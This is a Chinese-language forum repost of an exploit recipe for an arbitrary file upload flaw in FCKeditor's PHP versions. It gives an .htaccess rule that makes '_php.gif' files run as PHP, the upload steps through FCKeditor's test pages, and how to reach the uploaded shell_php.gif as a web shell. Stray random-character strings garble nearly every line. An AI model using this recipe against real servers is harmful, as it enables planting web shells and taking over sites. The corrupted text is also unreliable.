FCKeditor所有php版本Upload上传漏洞+ M' A( Q& L5 ^+ _! p, R
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07; y8 i" j$ v, G6 X& _8 C8 _
减小字体 增大字体
5 s5 c0 ^. u; M2 i, q* J[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability9 _. D* v, l$ l* Y; g/ R" H
[+] Date: 2011. q2 C1 ?1 g m: R' } P* x. _2 W
[+] Author : sinesafe.cn# x& y" E1 |+ W) m7 i0 T3 a
[+] Website : WwW.sinesafe.cn
6 g, {+ G" x$ I! z4 I1 |7 y, D———————————————————
! U! i0 \0 W, a7 W# `! z5 x1.create a htaccess file:3 ~$ Z( U% J; X7 g5 W- s% X' N
code:
! i; _* v, C0 O. ?1 M; z7 y& C<FilesMatch “_php.gif”>1 {+ \2 F7 Z9 O Q
SetHandler application/x-httpd-php
6 F: I! b* z+ m0 \" Y+ w+ v0 u</FilesMatch>. k T3 Q, g% I$ O# |0 O
2 z! [; d/ o# ~2.Now upload this htaccess with FCKeditor.: A0 }0 k9 u n& F$ }: f- y0 J
% L1 [; R+ I: i- Ehttp://www.sinesafe.cn/FCKeditor ... er/upload/test.html- N3 ^, ?; ?5 B k3 L0 f
Q" f" T/ t7 u
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html! X+ V2 ]! y: o) E6 {5 K! [
/ j z. N6 `) R, C! ^
———————————————————————————————-
2 B1 T/ [- j; N3.Now upload shell.php.gif with FCKeditor.
7 c2 { T; c$ Q% U$ R4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
8 y5 Y% G/ W; j! q+ N7 C( y5.http://www.sinesafe.cn/anything/shell_php.gif
$ }7 E; O8 P x3 w& p# h0 d `1 j6.Now shell is available from server. |
' [9 y- I& ]- \8 ~
& j- M0 _& Y0 H% o) B5 Q
! t) r+ I1 C3 b8 T( ? |
发表于 2013-10-27 17:25:21
收藏
支持
反对